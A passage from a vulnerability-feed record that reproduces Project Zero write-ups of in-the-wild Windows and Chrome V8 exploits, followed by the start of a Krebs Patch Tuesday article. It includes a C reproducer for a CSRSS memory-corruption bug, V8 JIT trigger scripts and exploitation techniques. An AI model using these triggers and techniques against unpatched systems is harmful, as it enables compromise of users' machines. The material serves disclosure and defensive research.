execution continues in the ROP chain.\n\n8\\. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.\n\n### The fix\n\nWe reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.\n\nThe patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:\n\nApplicationName = ApiMessage->CreateActivationContext.ApplicationName;\n\nif (ApplicationName.MaximumLength &&\n\n!CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,\n\nApplicationName.MaximumLength, 1)) {\n\nSavedMaximumLength = ApplicationName.MaximumLength;\n\nApplicationName.MaximumLength = ApplicationName.Length + 2;\n\n}\n\n[...]\n\nif (SavedMaximumLength)\n\nApiMessage->CreateActivationContext.ApplicationName.MaximumLength =\n\nSavedMaximumLength;\n\nreturn result; \n \n--- \n \n### Appendix A\n\nThe following reproducer has been tested on Windows 10.0.18363.959.\n\n#include <stdint.h>\n\n#include <stdio.h>\n\n#include <windows.h>\n\n#include <string>\n\nconst char* MANIFEST_CONTENTS =\n\n\"<?xml version='1.0' encoding='UTF-8' standalone='yes'?>\"\n\n\"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>\"\n\n\"<assemblyIdentity name='@' version='1.0.0.0' type='win32' \"\n\n\"processorArchitecture='amd64'/>\"\n\n\"</assembly>\";\n\nconst WCHAR* NULL_BYTE_STR = L\"\\x00\\x00\";\n\nconst WCHAR* MANIFEST_NAME =\n\nL\"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_\"\n\nL\"d761caeca23d64a2.manifest\";\n\nconst WCHAR* PATH = L\"\\\\\\\\\\\\\\\\.\\\\\\c:Windows\\\\\\\";\n\nconst WCHAR* MODULE = L\"System.Data.SqlXml.Resources\";\n\ntypedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,\n\nULONG BufferSize);\n\nf_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;\n\ntypedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,\n\nPVOID CaptureBuffer,\n\nULONG ApiNumber,\n\nULONG DataLength);\n\nf_CsrClientCallServer CsrClientCallServer;\n\ntypedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,\n\nPCSTR String,\n\nULONG Length,\n\nULONG MaximumLength,\n\nPSTR OutputString);\n\nf_CsrCaptureMessageString CsrCaptureMessageString;\n\nNTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,\n\nPCWSTR String, ULONG Length = 0) {\n\nif (Length == 0) {\n\nLength = lstrlenW(String);\n\n}\n\nreturn CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,\n\nLength * 2 + 2, OutputString);\n\n}\n\nint main() {\n\nHMODULE Ntdll = LoadLibrary(L\"Ntdll.dll\");\n\nCsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(\n\nNtdll, \"CsrAllocateCaptureBuffer\");\n\nCsrClientCallServer =\n\n(f_CsrClientCallServer)GetProcAddress(Ntdll, \"CsrClientCallServer\");\n\nCsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(\n\nNtdll, \"CsrCaptureMessageString\");\n\nchar Message[0x220];\n\nmemset(Message, 0, 0x220);\n\nPVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);\n\nstd::string Manifest = MANIFEST_CONTENTS;\n\nManifest.replace(Manifest.find('@'), 1, 0x2000, 'A');\n\n// There's no public definition of the relevant CSR_API_MSG structure.\n\n// The offsets and values are taken directly from the exploit.\n\n*(uint32_t*)(Message + 0x40) = 0xc1;\n\n*(uint16_t*)(Message + 0x44) = 9;\n\n*(uint16_t*)(Message + 0x59) = 0x201;\n\n// CSRSS loads the manifest contents from the client process memory;\n\n// therefore, it doesn't have to be stored in the capture buffer.\n\n*(const char**)(Message + 0x80) = Manifest.c_str();\n\n*(uint64_t*)(Message + 0x88) = Manifest.size();\n\n*(uint64_t*)(Message + 0xf0) = 1;\n\nCaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);\n\nCaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);\n\nCaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);\n\nCaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);\n\n// Triggers the issue by setting ApplicationName.MaxLength to a large value.\n\n*(uint16_t*)(Message + 0x122) = 0x8000;\n\nCsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);\n\n} \n \n--- \n \nThis is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).\n", "modified": "2021-01-12T00:00:00", "published": "2021-01-12T00:00:00", "id": "GOOGLEPROJECTZERO:C4CBD27E9FA33882CD77C7DAC1496DD3", "href": "https://googleprojectzero.blogspot.com/2021/01/in-wild-series-windows-exploits.html", "type": "googleprojectzero", "title": "\nIn-the-Wild Series: Windows Exploits\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-13T07:23:58", "bulletinFamily": "info", "cvelist": ["CVE-2017-5070", "CVE-2019-13764", "CVE-2019-5782", "CVE-2020-6418"], "description": "This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).\n\nPosted by Sergei Glazunov, Project Zero\n\n### Introduction\n\nAs we continue the series on the watering hole attack discovered in early 2020, in this post we\u2019ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.\n\n[](<https://1.bp.blogspot.com/-zWgmKrcnjv8/X_4pAn_ymUI/AAAAAAAAanU/fBqLBzSDt7ks8lax9SI1f-QkmTj31k-JwCNcBGAsYHQ/s1359/timeline.png>)\n\nAll vulnerabilities used by the attacker are in V8, Chrome\u2019s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still [exploited in real-world attacks](<https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/>) against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.\n\nThe bugs themselves aren\u2019t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker\u2019s exploit development process.\n\n### 1\\. CVE-2017-5070\n\n#### The vulnerability\n\nThis is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:\n\nglobal_array = [, 1.1];\n\nfunction trigger(local_array) {\n\nvar temp = global_array[0];\n\nlocal_array[1] = {};\n\nreturn global_array[1];\n\n}\n\ntrigger([, {}]);\n\ntrigger([, 1.1]);\n\nfor (var i = 0; i < 10000; i++) {\n\ntrigger([, {}]);\n\n}\n\nprint(trigger(global_array)); \n \n--- \n \nThe first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the \u201cshape\u201d of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can\u2019t point to the same object, it doesn\u2019t invalidate the recorded map state of global_array and, consequently, eliminates the \u201credundant\u201d map check in the last line of the function.\n\nThe vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.\n\nThe issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=722756>) by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8.git/+/e33fd30777f99a0d6e16b16d096a2663b1031457>) made made the alias analyser use the constant comparison only when both arguments are constants:\n\nHAliasing Query(HValue* a, HValue* b) {\n\n[...]\n\n// Constant objects can be distinguished statically.\n\n- if (a->IsConstant()) {\n\n+ if (a->IsConstant() && b->IsConstant()) {\n\nreturn a->Equals(b) ? kMustAlias : kNoAlias;\n\n}\n\nreturn kMayAlias; \n \n--- \n \n#### Exploit 1\n\nThe earliest exploit we\u2019ve discovered targets Chrome 37-58. This is the widest version range we\u2019ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.\n\nThe author of the exploit takes a [known approach](<http://phrack.org/papers/attacking_javascript_engines.html>) to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It \u201cconstructs\u201d a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can\u2019t be modified. Instead, it\u2019s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.\n\nThe exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.\n\nThe author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren\u2019t moved by the garbage collector. And, of course, the exploit runs inside a web worker.\n\nHowever, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it\u2019s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.\n\n#### Exploit 2\n\nThe second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit\u2019s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.\n\nThe general approach is similar, however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind as it\u2019s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.\n\nWhile it\u2019s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public [proof-of-concept](<https://chromium.googlesource.com/v8/v8/+/e33fd30777f99a0d6e16b16d096a2663b1031457/test/mjsunit/regress/regress-crbug-722756.js>).\n\n### 2\\. CVE-2020-6418\n\n#### The vulnerability\n\nThis is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:\n\n'use strict';\n\n(function() {\n\nvar popped;\n\nfunction trigger(new_target) {\n\nfunction inner(new_target) {\n\nfunction constructor() {\n\npopped = Array.prototype.pop.call(array);\n\n}\n\nvar temp = array[0];\n\nreturn Reflect.construct(constructor, arguments, new_target);\n\n}\n\ninner(new_target);\n\n}\n\nvar array = new Array(0, 0, 0, 0, 0);\n\nfor (var i = 0; i < 20000; i++) {\n\ntrigger(function() { });\n\narray.push(0);\n\n}\n\nvar proxy = new Proxy(Object, {\n\nget: () => (array[4] = 1.1, Object.prototype)\n\n});\n\ntrigger(proxy);\n\nprint(popped);\n\n}()); \n \n--- \n \nA call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable meaning that it doesn\u2019t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.\n\nNote that the attacker can\u2019t call the array function directly because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.\n\nThis is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=1053604>) under the 7-day deadline. [The one-line patch](<https://chromium.googlesource.com/v8/v8.git/+/fb0a60e15695466621cf65932f9152935d859447>) modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:\n\nInferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(\n\n[...]\n\nInferReceiverMapsResult result = kReliableReceiverMaps;\n\n[...]\n\ncase IrOpcode::kJSCreate: {\n\nif (IsSame(receiver, effect)) {\n\nbase::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);\n\nif (initial_map.has_value()) {\n\n*maps_return = ZoneHandleSet<Map>(initial_map->object());\n\nreturn result;\n\n}\n\n// We reached the allocation of the {receiver}.\n\nreturn kNoReceiverMaps;\n\n}\n\n+ result = kUnreliableReceiverMaps; // JSCreate can have side-effect.\n\nbreak;\n\n}\n\n[...] \n \n--- \n \nThe reader can refer to [the blog post](<https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping-chrome/>) published by Exodus Intel for more details on the issue and their version of the exploit.\n\n#### Exploit 1\n\nThis time there\u2019s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.\n\nThe exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the \u201cpopped\u201d value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.\n\nThe exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can \u201csurvive'' garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private [symbols](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol>), owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the \u201ctrustworthy\u201d indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.\n\nThe obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.\n\nFinally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.\n\nThe author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn\u2019t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.\n\nThe exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:\n\njit_detector[Symbol.toPrimitive] = function() {\n\nvar stack = (new Error).stack;\n\nif (stack.indexOf(\"Number (\") == -1) {\n\njit_detector.is_compiled = true;\n\n}\n\n};\n\nfunction trigger(array, proxy) {\n\nif (!jit_detector.is_compiled) {\n\nNumber(jit_detector);\n\n}\n\n[...] \n \n--- \n \nDuring compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.\n\nThe exploit was broken in Chrome 64 by [the change](<https://chromium.googlesource.com/v8/v8/+/52ab610bd13>) that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.\n\n#### Exploit 2\n\nAfter CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, [another commit](<https://chromium.googlesource.com/v8/v8/+/ccbbdb93a1c6f38422097738a830c137576d92fd>) landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:\n\nfunction trigger(new_target) {\n\nfunction inner(new_target) {\n\npopped = array.pop(\n\nReflect.construct(function() { }, arguments, new_target));\n\n}\n\ninner(new_target);\n\n} \n \n--- \n \nBy making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.\n\nThe new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn\u2019t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.\n\nThe exploit can\u2019t modify the class body indices directly as they\u2019re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.\n\nThis version targets Chrome 68-72. It was broken by [the commit](<https://chromium.googlesource.com/v8/v8.git/+/f7aa8ea00bbf200e9050a22ec84fab4f323849a7%5E%21/>) that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.\n\n#### Exploit 3 & 4\n\nThe actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That\u2019s the only significant change made by the author.\n\nExploit 3 is the only one we\u2019ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant amount of number and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.\n\nThe exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.\n\n[The public exploit](<https://blog.exodusintel.com/wp-content/uploads/2020/05/exp.zip>) presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn\u2019t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the [pointer compression](<https://v8.dev/blog/pointer-compression>) feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.\n\n### 3\\. CVE-2019-5782\n\n### The vulnerability\n\nCVE-2019-5782 is an issue in TurboFan\u2019s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.\n\nNote that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the [previous post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).\n\nIn this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:\n\noob_index = 100000;\n\nfunction trigger() {\n\nlet array = [1.1, 1.1];\n\nlet index = arguments.length;\n\nindex = index - 65534;\n\nindex = Math.max(index, 0);\n\nreturn array[index] = 2.2;\n\n}\n\nfor (let i = 0; i < 20000; i++) {\n\ntrigger(1,2,3);\n\n}\n\nprint(trigger.apply(null, new Array(65534 + oob_index))); \n \n--- \n \nQixun Zhao used the same vulnerability in Tianfu Cup and [reported it to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>) in November 2018. The public report includes a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8/+/8e4588915ba7a9d9d744075781cea114d49f0c7b>), which landed in Chrome 72, simply relaxed the range of the length property.\n\n#### The exploit\n\nThe discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn\u2019t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It\u2019s worth noting that this approach doesn\u2019t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.\n\nInterestingly, this is the only exploit that doesn\u2019t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.\n\nAs the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that [one of the hardening patches](<https://chromium.googlesource.com/v8/v8.git/+/f53dfd934df0c95e1a82680ce87f48b5d60902d1%5E%21/>) against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with [site isolation](<https://www.chromium.org/Home/chromium-security/site-isolation>); hence, [the public exploit](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>), which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.\n\nThe public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known [since at least 2017](<https://bugs.chromium.org/p/chromium/issues/detail?id=762874>). The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.\n\n### 4\\. CVE-2019-13764\n\nThis more complex typer issue occurs when TurboFan doesn\u2019t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:\n\nfor (var i = -Infinity; i < 0; i += Infinity) { [...] } \n \n--- \n \nThis vulnerability and exploit for Chrome 73-79 have been discussed in detail in [the previous blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>). There\u2019s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.\n\nThe comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn\u2019t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.\n\nIt\u2019s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have \u201crevived\u201d the exploit for CVE-2019-5782.\n\n### Conclusion\n\nThe timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.\n\nIt is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice.\n\nThe area of JIT engine security has received great attention from the wider security community over the last few years. In 2015, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don\u2019t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.\n\nThis is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 4: Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>).\n", "modified": "2021-01-12T00:00:00", "published": "2021-01-12T00:00:00", "id": "GOOGLEPROJECTZERO:9523EA61EA974CED8A3D9198CD0D5F6D", "href": "https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html", "type": "googleprojectzero", "title": "\nIn-the-Wild Series: Chrome Exploits\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2020-04-18T09:42:02", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0796", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-1020", "CVE-2020-1027"], "description": "**Microsoft** today released updates to fix 113 security vulnerabilities in its various **Windows** operating systems and related software. Those include at least three flaws that are actively being exploited, as well as two others which were publicly detailed prior to today, potentially giving attackers a head start in figuring out how to exploit the bugs.\n\nNineteen of the weaknesses fixed on this Patch Tuesday were assigned Microsoft's most-dire \u201ccritical\u201d rating, meaning malware or miscreants could exploit them to gain complete, remote control over vulnerable computers without any help from users.\n\nNear the top of the heap is [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), a remotely exploitable bug in the **Adobe Font Manager** library that was first detailed in late March when Microsoft said it had seen the flaw being used in active attacks.\n\nThe Adobe Font Manager library is the source of yet another zero-day flaw -- [CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>) -- although experts at security vendor **Tenable** say there is currently no confirmation that the two are related to the same set of in-the-wild attacks. Both flaws could be exploited by getting a Windows users to open a booby-trapped document or viewing one in the Windows Preview Pane.\n\nThe other zero-day flaw ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) affects **Windows 7** and **Windows 10 systems**, and earned a slightly less dire \"important\" rating from Microsoft because it's an \"elevation of privilege\" bug that requires the attacker to be locally authenticated.\n\nMany security news sites are reporting that Microsoft addressed a total of four zero-day flaws this month, but it appears the advisory for a critical Internet Explorer flaw ([CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>)) has been revised to indicate Microsoft has not yet received reports of it being used in active attacks. However, the advisory says this IE bug is likely to be exploited soon.\n\nResearchers at security firm **Recorded Future** zeroed in on [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>), a critical vulnerability dubbed \"SMBGhost\" that was rumored to exist in last month's Patch Tuesday but for which an out-of-band patch wasn't released until March 12. The problem resides in a file-sharing component of Windows, and could be exploited merely by sending the victim machine specially-crafted data packets. Proof-of-concept code showing how to exploit the bug was released April 1, but so far there are no indications this method has been incorporated into malware or active attacks.\n\nRecorded Future's **Allan Liska** notes that one reason these past few months have seen so many patches from Microsoft is the company [recently hired \"SandboxEscaper,\"](<https://twitter.com/SandboxBear/status/1210133985478791171>) a nickname used by the security researcher responsible for [releasing more than a half-dozen zero-day flaws](<https://arstechnica.com/information-technology/2019/05/serial-publisher-of-windows-0days-drops-exploits-for-3-more-unfixed-flaws/>) against Microsoft products last year.\n\n\"SandboxEscaper has made several contributions to this month\u2019s Patch Tuesday,\" Liska said. \"This is great news for Microsoft and the security community at large.\"\n\nOnce again, Adobe has blessed us with a respite from updating its Flash Player program with security fixes. I look forward to the end of this year, when the company has promised to sunset this buggy and insecure program once and for all. Adobe did release security updates for its [ColdFusion, After Effects and Digital Editions software](<https://blogs.adobe.com/psirt/?p=1859>).\n\nSpeaking of buggy software platforms, **Oracle** has released a quarterly patch update to fix more than 400 security flaws across multiple products, including its **Java SE** program. If you've got Java installed and you need/want to keep it installed, please [make sure it's up-to-date](<https://java.com/en/download/help/java_update.xml#manual>).\n\nNow for my obligatory disclaimers. Just a friendly reminder that while many of the vulnerabilities fixed in today\u2019s Microsoft patch batch affect Windows 7 operating systems -- including all three of the zero-day flaws -- this OS is no longer being supported with security updates (unless you\u2019re an enterprise taking advantage of Microsoft\u2019s [paid extended security updates program](<https://support.microsoft.com/en-us/help/4527878/faq-about-extended-security-updates-for-windows-7>), which is available to Windows 7 Professional and Windows 7 enterprise users).\n\nIf you rely on Windows 7 for day-to-day use, it\u2019s to think about upgrading to something newer. That something might be a computer with Windows 10. Or maybe you have always wanted that shiny MacOS computer.\n\nIf cost is a primary motivator and the user you have in mind doesn\u2019t do much with the system other than browsing the Web, perhaps a **Chromebook** or an older machine with a recent version of **Linux** is the answer (Ubuntu may be easiest for non-Linux natives). Whichever system you choose, 